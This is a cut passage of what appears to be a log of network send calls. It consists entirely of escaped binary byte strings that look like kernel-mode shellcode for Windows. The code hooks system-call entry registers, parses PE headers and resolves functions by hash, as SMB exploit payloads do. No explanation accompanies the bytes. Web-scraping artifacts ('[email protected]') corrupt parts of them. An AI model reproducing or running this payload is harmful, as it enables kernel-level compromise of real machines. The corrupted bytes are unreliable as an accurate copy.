'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\